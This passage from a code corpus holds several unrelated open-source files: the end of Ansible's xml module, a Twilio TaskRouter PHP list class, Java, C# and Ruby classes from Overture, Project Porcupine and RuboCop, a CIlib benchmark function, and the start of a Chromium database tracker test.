                    tree.write(xml_file, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
    elif module.params['xmlstring']:
        result['xmlstring'] = xml_string
        # NOTE: Modifying a string is not considered a change !
        if xml_string != module.params['xmlstring']:
            result['changed'] = True

    module.exit_json(**result)
def finish(module, tree, xpath, namespaces, changed=False, msg='', hitcount=0, matches=tuple()):
    """Build the module result, persist the tree when it changed, and exit.

    NOTE(review): the `changed` parameter is accepted but not used -- the
    change status is recomputed via has_changed(tree) against the module
    global `orig_doc`; confirm before relying on the parameter.
    """
    result = dict(
        actions=dict(
            xpath=xpath,
            namespaces=namespaces,
            state=module.params['state']
        ),
        changed=has_changed(tree),
    )

    if module.params['count'] or hitcount:
        result['count'] = hitcount

    if module.params['print_match'] or matches:
        result['matches'] = matches

    if msg:
        result['msg'] = msg

    if result['changed']:
        if module._diff:
            # Diff against the pristine copy taken in main().
            result['diff'] = dict(
                before=etree.tostring(orig_doc, xml_declaration=True, encoding='UTF-8', pretty_print=True),
                after=etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=True),
            )

        if module.params['path'] and not module.check_mode:
            if module.params['backup']:
                result['backup_file'] = module.backup_local(module.params['path'])
            tree.write(module.params['path'], xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])

    if module.params['xmlstring']:
        result['xmlstring'] = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])

    module.exit_json(**result)
def main():
    """Module entry point: parse arguments, load the XML source, and dispatch
    to exactly one action (each action function exits via finish/exit_json,
    so control falls through to the next check only when the earlier one did
    not apply)."""
    module = AnsibleModule(
        argument_spec=dict(
            path=dict(type='path', aliases=['dest', 'file']),
            xmlstring=dict(type='str'),
            xpath=dict(type='str'),
            namespaces=dict(type='dict', default={}),
            state=dict(type='str', default='present', choices=['absent', 'present'], aliases=['ensure']),
            value=dict(type='raw'),
            attribute=dict(type='raw'),
            add_children=dict(type='list'),
            set_children=dict(type='list'),
            count=dict(type='bool', default=False),
            print_match=dict(type='bool', default=False),
            pretty_print=dict(type='bool', default=False),
            content=dict(type='str', choices=['attribute', 'text']),
            input_type=dict(type='str', default='yaml', choices=['xml', 'yaml']),
            backup=dict(type='bool', default=False),
            strip_cdata_tags=dict(type='bool', default=False),
            insertbefore=dict(type='bool', default=False),
            insertafter=dict(type='bool', default=False),
        ),
        supports_check_mode=True,
        # TODO: Implement this as soon as #28662 (required_by functionality) is merged
        # required_by=dict(
        # add_children=['xpath'],
        # attribute=['value'],
        # set_children=['xpath'],
        # value=['xpath'],
        # ),
        required_if=[
            ['content', 'attribute', ['xpath']],
            ['content', 'text', ['xpath']],
            ['count', True, ['xpath']],
            ['print_match', True, ['xpath']],
            ['insertbefore', True, ['xpath']],
            ['insertafter', True, ['xpath']],
        ],
        required_one_of=[
            ['path', 'xmlstring'],
            ['add_children', 'content', 'count', 'pretty_print', 'print_match', 'set_children', 'value'],
        ],
        mutually_exclusive=[
            ['add_children', 'content', 'count', 'print_match', 'set_children', 'value'],
            ['path', 'xmlstring'],
            ['insertbefore', 'insertafter'],
        ],
    )

    xml_file = module.params['path']
    xml_string = module.params['xmlstring']
    xpath = module.params['xpath']
    namespaces = module.params['namespaces']
    state = module.params['state']
    value = json_dict_bytes_to_unicode(module.params['value'])
    attribute = module.params['attribute']
    set_children = json_dict_bytes_to_unicode(module.params['set_children'])
    add_children = json_dict_bytes_to_unicode(module.params['add_children'])
    pretty_print = module.params['pretty_print']
    content = module.params['content']
    input_type = module.params['input_type']
    print_match = module.params['print_match']
    count = module.params['count']
    backup = module.params['backup']
    strip_cdata_tags = module.params['strip_cdata_tags']
    insertbefore = module.params['insertbefore']
    insertafter = module.params['insertafter']

    # Check if we have lxml 2.3.0 or newer installed
    if not HAS_LXML:
        module.fail_json(msg='The xml ansible module requires the lxml python library installed on the managed machine')
    elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('2.3.0'):
        module.fail_json(msg='The xml ansible module requires lxml 2.3.0 or newer installed on the managed machine')
    elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('3.0.0'):
        module.warn('Using lxml version lower than 3.0.0 does not guarantee predictable element attribute order.')

    # Check if the file exists
    if xml_string:
        infile = BytesIO(to_bytes(xml_string, errors='surrogate_or_strict'))
    elif os.path.isfile(xml_file):
        infile = open(xml_file, 'rb')
    else:
        module.fail_json(msg="The target XML source '%s' does not exist." % xml_file)

    # Parse and evaluate xpath expression
    if xpath is not None:
        try:
            etree.XPath(xpath)
        except etree.XPathSyntaxError as e:
            module.fail_json(msg="Syntax error in xpath expression: %s (%s)" % (xpath, e))
        except etree.XPathEvalError as e:
            module.fail_json(msg="Evaluation error in xpath expression: %s (%s)" % (xpath, e))

    # Try to parse in the target XML file
    try:
        parser = etree.XMLParser(remove_blank_text=pretty_print, strip_cdata=strip_cdata_tags)
        doc = etree.parse(infile, parser)
    except etree.XMLSyntaxError as e:
        module.fail_json(msg="Error while parsing document: %s (%s)" % (xml_file or 'xml_string', e))

    # Ensure we have the original copy to compare
    global orig_doc
    orig_doc = copy.deepcopy(doc)

    if print_match:
        do_print_match(module, doc, xpath, namespaces)

    if count:
        count_nodes(module, doc, xpath, namespaces)

    if content == 'attribute':
        get_element_attr(module, doc, xpath, namespaces)
    elif content == 'text':
        get_element_text(module, doc, xpath, namespaces)

    # File exists:
    if state == 'absent':
        # - absent: delete xpath target
        delete_xpath_target(module, doc, xpath, namespaces)

    # - present: carry on

    # children && value both set?: should have already aborted by now
    # add_children && set_children both set?: should have already aborted by now

    # set_children set?
    if set_children:
        set_target_children(module, doc, xpath, namespaces, set_children, input_type)

    # add_children set?
    if add_children:
        add_target_children(module, doc, xpath, namespaces, add_children, input_type, insertbefore, insertafter)

    # No?: Carry on

    # Is the xpath target an attribute selector?
    if value is not None:
        set_target(module, doc, xpath, namespaces, attribute, value)

    # If an xpath was provided, we need to do something with the data
    if xpath is not None:
        ensure_xpath_exists(module, doc, xpath, namespaces)

    # Otherwise only reformat the xml data?
    if pretty_print:
        make_pretty(module, doc)

    module.fail_json(msg="Don't know what to do")
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
| valentin-krasontovitsch/ansible | lib/ansible/modules/files/xml.py | Python | gpl-3.0 | 35,343 |
<?php
/**
* This code was generated by
* \ / _ _ _| _ _
* | (_)\/(_)(_|\/| |(/_ v1.0.0
* / /
*/
namespace Twilio\Rest\Taskrouter\V1\Workspace;
use Twilio\ListResource;
use Twilio\Options;
use Twilio\Values;
use Twilio\Version;
class WorkflowList extends ListResource {
/**
 * Construct the WorkflowList
 *
 * @param Version $version Version that contains the resource
 * @param string $workspaceSid The workspace_sid
 * @return \Twilio\Rest\Taskrouter\V1\Workspace\WorkflowList
 */
public function __construct(Version $version, $workspaceSid) {
    parent::__construct($version);

    // Path Solution: remember the workspace this list is scoped to.
    $this->solution = array('workspaceSid' => $workspaceSid, );

    // Resource collection URI under the owning workspace.
    $this->uri = '/Workspaces/' . rawurlencode($workspaceSid) . '/Workflows';
}
/**
 * Streams WorkflowInstance records from the API as a generator stream.
 * Records are loaded lazily and efficiently until `$limit` is reached,
 * keeping memory usage low.
 *
 * @param array|Options $options Optional Arguments
 * @param int $limit Upper limit for the number of records to return. stream()
 *                   guarantees to never return more than limit. Default is no
 *                   limit
 * @param mixed $pageSize Number of records to fetch per request, when not set
 *                        will use the default value of 50 records. If no
 *                        page_size is defined but a limit is defined, stream()
 *                        will attempt to read the limit with the most
 *                        efficient page size, i.e. min(limit, 1000)
 * @return \Twilio\Stream stream of results
 */
public function stream($options = array(), $limit = null, $pageSize = null) {
    $limits = $this->version->readLimits($limit, $pageSize);

    // Fetch the first page eagerly; the stream walks the rest lazily.
    $firstPage = $this->page($options, $limits['pageSize']);

    return $this->version->stream($firstPage, $limits['limit'], $limits['pageLimit']);
}
/**
* Reads WorkflowInstance records from the API as a list.
* Unlike stream(), this operation is eager and will load `limit` records into
* memory before returning.
*
* @param array|Options $options Optional Arguments
* @param int $limit Upper limit for the number of records to return. read()
* guarantees to never return more than limit. Default is no
* limit
* @param mixed $pageSize Number of records to fetch per request, when not set
* will use the default value of 50 records. If no
* page_size is defined but a limit is defined, read()
* will attempt to read the limit with the most
* efficient page size, i.e. min(limit, 1000)
* @return WorkflowInstance[] Array of results
*/
public function read($options = array(), $limit = null, $pageSize = Values::NONE) {
return iterator_to_array($this->stream($options, $limit, $pageSize), false);
}
/**
* Retrieve a single page of WorkflowInstance records from the API.
* Request is executed immediately
*
* @param array|Options $options Optional Arguments
* @param mixed $pageSize Number of records to return, defaults to 50
* @param string $pageToken PageToken provided by the API
* @param mixed $pageNumber Page Number, this value is simply for client state
* @return \Twilio\Page Page of WorkflowInstance
*/
public function page($options = array(), $pageSize = Values::NONE, $pageToken = Values::NONE, $pageNumber = Values::NONE) {
$options = new Values($options);
$params = Values::of(array(
'FriendlyName' => $options['friendlyName'],
'PageToken' => $pageToken,
'Page' => $pageNumber,
'PageSize' => $pageSize,
));
$response = $this->version->page(
'GET',
$this->uri,
$params
);
return new WorkflowPage($this->version, $response, $this->solution);
}
/**
* Create a new WorkflowInstance
*
* @param string $friendlyName The friendly_name
* @param string $configuration The configuration
* @param array|Options $options Optional Arguments
* @return WorkflowInstance Newly created WorkflowInstance
*/
public function create($friendlyName, $configuration, $options = array()) {
$options = new Values($options);
$data = Values::of(array(
'FriendlyName' => $friendlyName,
'Configuration' => $configuration,
'AssignmentCallbackUrl' => $options['assignmentCallbackUrl'],
'FallbackAssignmentCallbackUrl' => $options['fallbackAssignmentCallbackUrl'],
'TaskReservationTimeout' => $options['taskReservationTimeout'],
));
$payload = $this->version->create(
'POST',
$this->uri,
array(),
$data
);
return new WorkflowInstance(
$this->version,
$payload,
$this->solution['workspaceSid']
);
}
/**
* Constructs a WorkflowContext
*
* @param string $sid The sid
* @return \Twilio\Rest\Taskrouter\V1\Workspace\WorkflowContext
*/
public function getContext($sid) {
return new WorkflowContext(
$this->version,
$this->solution['workspaceSid'],
$sid
);
}
/**
* Provide a friendly representation
*
* @return string Machine friendly representation
*/
public function __toString() {
return '[Twilio.Taskrouter.V1.WorkflowList]';
}
} | ggerman/twilionClient | vendor/twilio/sdk/Twilio/Rest/Taskrouter/V1/Workspace/WorkflowList.php | PHP | gpl-3.0 | 5,983 |
package org.overture.interpreter.messages.rtlog.nextgen;
import java.io.Serializable;
/**
 * Snapshot of a thread as recorded for next-generation RT log output.
 * Instances are serializable so logs can be persisted.
 */
public class NextGenThread implements Serializable
{
	private static final long serialVersionUID = 4292041684803164404L;
	/** Kind of thread: initialisation thread, main thread, or object-owned thread. */
	public enum ThreadType
	{
		INIT, MAIN, OBJECT
	}
	public Long id;
	public NextGenObject object;
	public NextGenCpu cpu;
	public boolean periodic;
	public ThreadType type;
	public NextGenThread(long id, NextGenCpu cpu, NextGenObject object,
			boolean periodic, ThreadType type)
	{
		this.id = id;
		this.cpu = cpu;
		this.object = object;
		this.periodic = periodic;
		this.type = type;
	}
	@Override
	public String toString()
	{
		// Same textual layout as before, produced by plain concatenation.
		return "Thread -> " + "id: " + this.id
				+ " periodic: " + this.periodic
				+ " cpuid: " + this.cpu.id
				+ " type: " + this.type;
	}
}
| KlapZaZa/overture | core/interpreter/src/main/java/org/overture/interpreter/messages/rtlog/nextgen/NextGenThread.java | Java | gpl-3.0 | 946 |
#region License
// ====================================================
// Project Porcupine Copyright(C) 2016 Team Porcupine
// This program comes with ABSOLUTELY NO WARRANTY; This is free software,
// and you are welcome to redistribute it under certain conditions; See
// file LICENSE, which is part of this source code package, for details.
// ====================================================
#endregion
using System.Collections.Generic;
using System.Linq;
using System.Xml;
using UnityEngine;
public class TraderPrototype : IPrototypable
{
    // Backing field for Rarity; clamped to [0, 1] by the setter.
    private float rarity;

    public string Type { get; set; }

    public List<string> PotentialNames { get; set; }

    public float MinCurrencyBalance { get; set; }

    public float MaxCurrencyBalance { get; set; }

    public string CurrencyName { get; set; }

    public float MinSaleMarginMultiplier { get; set; }

    public float MaxSaleMarginMultiplier { get; set; }

    public List<TraderPotentialInventory> PotentialStock { get; set; }

    /// <summary>
    /// Value from 0 to 1, higher value represent higher availability of the trade resource.
    /// </summary>
    public float Rarity
    {
        get
        {
            return rarity;
        }

        set
        {
            rarity = Mathf.Clamp(value, 0f, 1f);
        }
    }

    /// <summary>
    /// Populates this prototype from an XML reader positioned on a trader element.
    /// </summary>
    public void ReadXmlPrototype(XmlReader reader_parent)
    {
        Type = reader_parent.GetAttribute("type");

        XmlReader reader = reader_parent.ReadSubtree();
        while (reader.Read())
        {
            switch (reader.Name)
            {
                case "potentialNames":
                    PotentialNames = new List<string>();
                    XmlReader namesReader = reader.ReadSubtree();
                    while (namesReader.Read())
                    {
                        if (namesReader.Name == "name")
                        {
                            PotentialNames.Add(namesReader.ReadElementContentAsString());
                        }
                    }

                    break;
                case "currencyName":
                    reader.Read();
                    CurrencyName = reader.ReadContentAsString();
                    break;
                case "minCurrencyBalance":
                    reader.Read();
                    MinCurrencyBalance = reader.ReadContentAsInt();
                    break;
                case "maxCurrencyBalance":
                    reader.Read();
                    MaxCurrencyBalance = reader.ReadContentAsInt();
                    break;
                case "minSaleMarginMultiplier":
                    reader.Read();
                    MinSaleMarginMultiplier = reader.ReadContentAsFloat();
                    break;
                case "maxSaleMarginMultiplier":
                    reader.Read();
                    MaxSaleMarginMultiplier = reader.ReadContentAsFloat();
                    break;
                case "potentialStock":
                    PotentialStock = new List<TraderPotentialInventory>();
                    XmlReader invs_reader = reader.ReadSubtree();
                    while (invs_reader.Read())
                    {
                        if (invs_reader.Name == "Inventory")
                        {
                            // Found an inventory requirement, so add it to the list!
                            PotentialStock.Add(new TraderPotentialInventory
                            {
                                Type = invs_reader.GetAttribute("type"),
                                Category = invs_reader.GetAttribute("category"),
                                MinQuantity = int.Parse(invs_reader.GetAttribute("minQuantity")),
                                MaxQuantity = int.Parse(invs_reader.GetAttribute("maxQuantity")),
                                Rarity = float.Parse(invs_reader.GetAttribute("rarity"))
                            });
                        }
                    }

                    break;
            }
        }
    }

    /// <summary>
    /// Create a random Trader out of this TraderPrototype.
    /// </summary>
    public Trader CreateTrader()
    {
        Trader t = new Trader
        {
            Currency = new Currency
            {
                Name = CurrencyName,
                Balance = Random.Range(MinCurrencyBalance, MaxCurrencyBalance),
                ShortName = World.Current.Wallet.Currencies[CurrencyName].ShortName
            },

            // The int overload of Random.Range excludes its upper bound, so pass
            // Count (not Count - 1); the previous code could never pick the last name.
            Name = PotentialNames[Random.Range(0, PotentialNames.Count)],
            SaleMarginMultiplier = Random.Range(MinSaleMarginMultiplier, MaxSaleMarginMultiplier),
            Stock = new List<Inventory>()
        };

        foreach (TraderPotentialInventory potentialStock in PotentialStock)
        {
            // NOTE(review): a higher per-item Rarity makes the item *less* likely
            // to be in stock here, which looks inverted relative to the Rarity
            // doc above ("higher value represent higher availability") - confirm.
            bool itemIsInStock = Random.Range(0f, 1f) > potentialStock.Rarity;

            if (itemIsInStock)
            {
                if (!string.IsNullOrEmpty(potentialStock.Type))
                {
                    // MaxQuantity + 1 because the int overload of Random.Range
                    // excludes its upper bound; quantities are meant inclusive.
                    Inventory inventory = new Inventory(
                        potentialStock.Type,
                        Random.Range(potentialStock.MinQuantity, potentialStock.MaxQuantity + 1));
                    t.Stock.Add(inventory);
                }
                else if (!string.IsNullOrEmpty(potentialStock.Category))
                {
                    // A category entry expands to one stack of every inventory
                    // prototype in that category.
                    List<InventoryCommon> potentialObjects = GetInventoryCommonWithCategory(potentialStock.Category);

                    foreach (InventoryCommon potentialObject in potentialObjects)
                    {
                        Inventory inventory = new Inventory(
                            potentialObject.type,
                            Random.Range(potentialStock.MinQuantity, potentialStock.MaxQuantity + 1));
                        t.Stock.Add(inventory);
                    }
                }
            }
        }

        return t;
    }

    // Returns all inventory prototypes whose category matches exactly.
    private List<InventoryCommon> GetInventoryCommonWithCategory(string category)
    {
        return PrototypeManager.Inventory.Values.Where(i => i.category == category).ToList();
    }
}
| therealjefe/ProjectPorcupine | Assets/Scripts/Models/Trade/TraderPrototype.cs | C# | gpl-3.0 | 6,137 |
# frozen_string_literal: true
module RuboCop
  module Cop
    module Style
      # This cop checks against comparing a variable with multiple items, where
      # `Array#include?`, `Set#include?` or a `case` could be used instead
      # to avoid code repetition.
      # It accepts comparisons of multiple method calls to avoid unnecessary method calls
      # by default. It can be configured by `AllowMethodComparison` option.
      #
      # @example
      #   # bad
      #   a = 'a'
      #   foo if a == 'a' || a == 'b' || a == 'c'
      #
      #   # good
      #   a = 'a'
      #   foo if ['a', 'b', 'c'].include?(a)
      #
      #   VALUES = Set['a', 'b', 'c'].freeze
      #   # elsewhere...
      #   foo if VALUES.include?(a)
      #
      #   case foo
      #   when 'a', 'b', 'c' then foo
      #   # ...
      #   end
      #
      #   # accepted (but consider `case` as above)
      #   foo if a == b.lightweight || a == b.heavyweight
      #
      # @example AllowMethodComparison: true (default)
      #   # good
      #   foo if a == b.lightweight || a == b.heavyweight
      #
      # @example AllowMethodComparison: false
      #   # bad
      #   foo if a == b.lightweight || a == b.heavyweight
      #
      #   # good
      #   foo if [b.lightweight, b.heavyweight].include?(a)
      class MultipleComparison < Base
        extend AutoCorrector
        MSG = 'Avoid comparing a variable with multiple items ' \
              'in a conditional, use `Array#include?` instead.'
        # Reset per-chain state before each file is inspected.
        def on_new_investigation
          @last_comparison = nil
        end
        def on_or(node)
          # Start collecting afresh when we have left the previously
          # registered `or` chain.
          reset_comparison if switch_comparison?(node)
          root_of_or_node = root_of_or_node(node)
          # Only report once, on the root of the whole `a == x || a == y` tree.
          return unless node == root_of_or_node
          return unless nested_variable_comparison?(root_of_or_node)
          # Comparisons against method calls are permitted when the
          # `AllowMethodComparison` option is enabled (the default).
          return if @allowed_method_comparison
          add_offense(node) do |corrector|
            # @compared_elements was populated by nested_variable_comparison?
            # above (via variables_in_simple_node).
            elements = @compared_elements.join(', ')
            prefer_method = "[#{elements}].include?(#{variables_in_node(node).first})"
            corrector.replace(node, prefer_method)
          end
          @last_comparison = node
        end
        private
        # @!method simple_double_comparison?(node)
        def_node_matcher :simple_double_comparison?, '(send $lvar :== $lvar)'
        # @!method simple_comparison_lhs?(node)
        def_node_matcher :simple_comparison_lhs?, <<~PATTERN
          (send $lvar :== $_)
        PATTERN
        # @!method simple_comparison_rhs?(node)
        def_node_matcher :simple_comparison_rhs?, <<~PATTERN
          (send $_ :== $lvar)
        PATTERN
        # True when every leaf of the `or` tree is a `==` comparison and all
        # of them involve exactly one distinct local variable.
        def nested_variable_comparison?(node)
          return false unless nested_comparison?(node)
          variables_in_node(node).count == 1
        end
        # Collects the distinct variable names referenced anywhere in the
        # (possibly nested) `or` tree.
        def variables_in_node(node)
          if node.or_type?
            node.node_parts.flat_map { |node_part| variables_in_node(node_part) }.uniq
          else
            variables_in_simple_node(node)
          end
        end
        # Returns the variable names in a single `==` node. Side effects:
        # records the compared value in @compared_elements and, when the value
        # is a method call and the option allows it, flags the whole chain as
        # allowed via @allowed_method_comparison.
        def variables_in_simple_node(node)
          simple_double_comparison?(node) do |var1, var2|
            return [variable_name(var1), variable_name(var2)]
          end
          # The multiple assignment unpacks the node-pattern captures; the
          # condition is truthy only when one of the two patterns matched.
          if (var, obj = simple_comparison_lhs?(node)) || (obj, var = simple_comparison_rhs?(node))
            @allowed_method_comparison = true if allow_method_comparison? && obj.send_type?
            @compared_elements << obj.source
            return [variable_name(var)]
          end
          []
        end
        # Extracts the name symbol from an lvar node.
        def variable_name(node)
          node.children[0]
        end
        # True when node is an `or` whose parts are all comparisons
        # (recursively).
        def nested_comparison?(node)
          if node.or_type?
            node.node_parts.all? { |node_part| comparison? node_part }
          else
            false
          end
        end
        def comparison?(node)
          simple_comparison_lhs?(node) || simple_comparison_rhs?(node) || nested_comparison?(node)
        end
        # Walks up parent `or` nodes to find the outermost `or` of the chain.
        def root_of_or_node(or_node)
          return or_node unless or_node.parent
          if or_node.parent.or_type?
            root_of_or_node(or_node.parent)
          else
            or_node
          end
        end
        # True when `node` is not contained in the last chain we offended on,
        # i.e. a new comparison chain has started.
        def switch_comparison?(node)
          return true if @last_comparison.nil?
          @last_comparison.descendants.none?(node)
        end
        def reset_comparison
          @compared_elements = []
          @allowed_method_comparison = false
        end
        def allow_method_comparison?
          cop_config.fetch('AllowMethodComparison', true)
        end
      end
    end
  end
end
| BeGe78/esood | vendor/bundle/ruby/3.0.0/gems/rubocop-1.18.3/lib/rubocop/cop/style/multiple_comparison.rb | Ruby | gpl-3.0 | 4,568 |
/** __ __
* _____ _/ /_/ /_ Computational Intelligence Library (CIlib)
* / ___/ / / / __ \ (c) CIRG @ UP
* / /__/ / / / /_/ / http://cilib.net
* \___/_/_/_/_.___/
*/
package net.sourceforge.cilib.functions.continuous.dynamic.moo.fda2mod_deb;
import net.sourceforge.cilib.algorithm.AbstractAlgorithm;
import net.sourceforge.cilib.functions.ContinuousFunction;
import net.sourceforge.cilib.problem.FunctionOptimisationProblem;
import net.sourceforge.cilib.type.types.container.Vector;
/**
 * This function is the h function of the FDA2_mod problem defined in the
 * following paper: K. Deb, U. Rao N and S. Karthik. Dynamic Multi-objective
 * optimization and decision making using modified NSGA-II: A case study on
 * hydro-thermal power scheduling, In Proceedings of the International
 * Conference on Evolutionary Multi-Criterion Optimization (EMO), Lecture Notes
 * in Computer Science, 4403:803-817, Springer-Verlag Berlin/Heidelberg, 2007.
 *
 */
public class FDA2_h extends ContinuousFunction {

    private static final long serialVersionUID = -637862405309737323L;

    //members
    ContinuousFunction fda2_f;
    ContinuousFunction fda2_g;
    FunctionOptimisationProblem fda2_f_problem;
    FunctionOptimisationProblem fda2_g_problem;
    //number of generations for which t remains fixed
    private int tau_t;
    //generation counter
    private int tau;
    //number of distinct steps in t
    private int n_t;
    //maximum number of iterations
    private int tau_max;

    /**
     * Creates a new instance of FDA2_h with the default dynamic settings:
     * tau_t = 5, n_t = 1, tau_max = 200.
     */
    public FDA2_h() {
        //initialize the members
        this.tau_t = 5;
        this.tau = 1;
        this.n_t = 1;
        this.tau_max = 200;
    }

    /**
     * Sets the f1 function with a specified problem.
     * @param problem FunctionOptimisationProblem used for the f1 function.
     */
    public void setFDA2_f(FunctionOptimisationProblem problem) {
        this.fda2_f_problem = problem;
        this.fda2_f = (ContinuousFunction) problem.getFunction();
    }

    /**
     * Returns the problem used to set the f1 function.
     * @return fda2_f_problem FunctionOptimisationProblem used for the f1
     * function.
     */
    public FunctionOptimisationProblem getFDA2_f_problem() {
        return this.fda2_f_problem;
    }

    /**
     * Sets the f1 function that is used in the FDA2 problem without specifying
     * the problem.
     * @param fda2_f ContinuousFunction used for the f1 function.
     */
    public void setFDA2_f(ContinuousFunction fda2_f) {
        this.fda2_f = fda2_f;
    }

    /**
     * Returns the f1 function that is used in the FDA2 problem.
     * @return fda2_f ContinuousFunction used for the f1 function.
     */
    public ContinuousFunction getFDA2_f() {
        return this.fda2_f;
    }

    /**
     * Sets the g function with a specified problem.
     * @param problem FunctionOptimisationProblem used for the g function.
     */
    public void setFDA2_g(FunctionOptimisationProblem problem) {
        this.fda2_g_problem = problem;
        this.fda2_g = (ContinuousFunction) problem.getFunction();
    }

    /**
     * Returns the problem used to set the g function.
     * @return fda2_g_problem FunctionOptimisationProblem used for the g
     * function.
     */
    public FunctionOptimisationProblem getFDA2_g_problem() {
        return this.fda2_g_problem;
    }

    /**
     * Sets the g function that is used in the FDA2 problem without specifying
     * the problem.
     * @param fda2_g ContinuousFunction used for the g function.
     */
    public void setFDA2_g(ContinuousFunction fda2_g) {
        this.fda2_g = fda2_g;
    }

    /**
     * Returns the g function that is used in the FDA2 problem.
     * @return fda2_g ContinuousFunction used for the g function.
     */
    public ContinuousFunction getFDA2_g() {
        return this.fda2_g;
    }

    /**
     * Sets the iteration number.
     * @param tau Iteration number.
     */
    public void setTau(int tau) {
        this.tau = tau;
    }

    /**
     * Returns the iteration number.
     * @return tau Iteration number.
     */
    public int getTau() {
        return this.tau;
    }

    /**
     * Sets the frequency of change.
     * @param tau_t Change frequency.
     */
    public void setTau_t(int tau_t) {
        this.tau_t = tau_t;
    }

    /**
     * Returns the frequency of change.
     * @return tau_t Change frequency.
     */
    public int getTau_t() {
        return this.tau_t;
    }

    /**
     * Sets the severity of change.
     * @param n_t Change severity.
     */
    public void setN_t(int n_t) {
        this.n_t = n_t;
    }

    /**
     * Returns the severity of change.
     * @return n_t Change severity.
     */
    public int getN_t() {
        return this.n_t;
    }

    /**
     * Evaluates the function at the current algorithm iteration.
     */
    @Override
    public Double f(Vector x) {
        this.tau = AbstractAlgorithm.get().getIterations();
        return this.apply(this.tau, x);
    }

    /**
     * Evaluates the function for a specific iteration.
     *
     * @param iteration Iteration at which to evaluate the landscape.
     * @param x Decision vector; split into xI (first element), xII (next 5)
     *          and xIII (the remainder) as prescribed by FDA2.
     */
    public Double apply(int iteration, Vector x) {
        // Time parameter. The trailing factor must be computed in floating
        // point: the original expression tau_t / (tau_max - tau_t) used
        // integer division, which truncated to 0 for the default settings
        // (5 / 195 == 0), freezing t_old at 0 and H at 0 so the problem
        // never actually changed over time.
        double t_old = (1.0 / (double) n_t) * 2.0
                * Math.floor((double) (iteration - 1.0) / (double) this.tau_t)
                * ((double) this.tau_t / (double) (this.tau_max - this.tau_t));
        double H = 2.0 * (Math.sin(0.5 * Math.PI * t_old));

        Vector xI = x;
        Vector xII = x;
        Vector xIII = x;
        if (x.size() > 1) {
            xI = x.copyOfRange(0, 1);
            xII = x.copyOfRange(1, 6);
            xIII = x.copyOfRange(6, x.size());
        }

        double f = this.fda2_f.f(xI);
        double g = this.fda2_g.f(xII);

        // h = 1 - (f/g)^(2 * (H + sum((x_k - H/4)^2)))
        double value = 1.0;
        double power = H;
        for (int k = 0; k < xIII.size(); k++) {
            power += Math.pow(xIII.doubleValueOf(k) - (H / 4.0), 2);
        }
        double f_div_g = Math.pow((double) f / (double) g, 2.0);
        value -= Math.pow(f_div_g, power);
        return value;
    }
}
| krharrison/cilib | library/src/main/java/net/sourceforge/cilib/functions/continuous/dynamic/moo/fda2mod_deb/FDA2_h.java | Java | gpl-3.0 | 6,011 |
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <stddef.h>
#include <stdint.h>
#include <memory>
#include "base/files/file.h"
#include "base/files/file_path.h"
#include "base/files/file_util.h"
#include "base/files/scoped_temp_dir.h"
#include "base/message_loop/message_loop.h"
#include "base/strings/utf_string_conversions.h"
#include "base/threading/thread_task_runner_handle.h"
#include "base/time/time.h"
#include "content/public/test/mock_special_storage_policy.h"
#include "net/base/net_errors.h"
#include "net/base/test_completion_callback.h"
#include "storage/browser/database/database_tracker.h"
#include "storage/browser/quota/quota_manager_proxy.h"
#include "storage/common/database/database_identifier.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "third_party/sqlite/sqlite3.h"
using base::ASCIIToUTF16;
using storage::DatabaseConnections;
using storage::DatabaseTracker;
using storage::OriginInfo;
namespace {
const char kOrigin1Url[] = "http://origin1";
const char kOrigin2Url[] = "http://protected_origin2";
// Records the most recent size-change / scheduled-deletion notification so
// tests can assert on exactly what the tracker reported.
class TestObserver : public storage::DatabaseTracker::Observer {
 public:
  // Observes both size changes and scheduled deletions (delegates to the
  // two-argument constructor to avoid duplicating the init list).
  TestObserver() : TestObserver(true, true) {}

  TestObserver(bool observe_size_changes, bool observe_scheduled_deletions)
      : new_notification_received_(false),
        observe_size_changes_(observe_size_changes),
        observe_scheduled_deletions_(observe_scheduled_deletions) {
  }

  ~TestObserver() override {}

  void OnDatabaseSizeChanged(const std::string& origin_identifier,
                             const base::string16& database_name,
                             int64_t database_size) override {
    if (!observe_size_changes_)
      return;
    new_notification_received_ = true;
    origin_identifier_ = origin_identifier;
    database_name_ = database_name;
    database_size_ = database_size;
  }

  void OnDatabaseScheduledForDeletion(
      const std::string& origin_identifier,
      const base::string16& database_name) override {
    if (!observe_scheduled_deletions_)
      return;
    new_notification_received_ = true;
    origin_identifier_ = origin_identifier;
    database_name_ = database_name;
  }

  // One-shot check: returns whether a notification arrived since the last
  // call, and clears the flag.
  bool DidReceiveNewNotification() {
    bool temp_new_notification_received = new_notification_received_;
    new_notification_received_ = false;
    return temp_new_notification_received;
  }

  std::string GetNotificationOriginIdentifier() {
    return origin_identifier_;
  }

  base::string16 GetNotificationDatabaseName() { return database_name_; }
  int64_t GetNotificationDatabaseSize() { return database_size_; }

 private:
  bool new_notification_received_;
  bool observe_size_changes_;
  bool observe_scheduled_deletions_;
  std::string origin_identifier_;
  base::string16 database_name_;
  // Initialized so reading the size before any notification is well-defined.
  int64_t database_size_ = 0;
};
// Asserts that |observer| saw a new notification carrying exactly the given
// origin, database name and size.
void CheckNotificationReceived(TestObserver* observer,
                               const std::string& expected_origin_identifier,
                               const base::string16& expected_database_name,
                               int64_t expected_database_size) {
  EXPECT_TRUE(observer->DidReceiveNewNotification());
  EXPECT_EQ(expected_origin_identifier,
            observer->GetNotificationOriginIdentifier());
  EXPECT_EQ(expected_database_name, observer->GetNotificationDatabaseName());
  EXPECT_EQ(expected_database_size, observer->GetNotificationDatabaseSize());
}
// QuotaManagerProxy double that records access/modification notifications so
// tests can verify the database tracker reports quota events correctly.
// Uses nullptr throughout (the file already relies on C++11 `override`).
class TestQuotaManagerProxy : public storage::QuotaManagerProxy {
 public:
  TestQuotaManagerProxy()
      : QuotaManagerProxy(nullptr, nullptr),
        registered_client_(nullptr) {
  }

  void RegisterClient(storage::QuotaClient* client) override {
    // Only one client may ever register.
    EXPECT_FALSE(registered_client_);
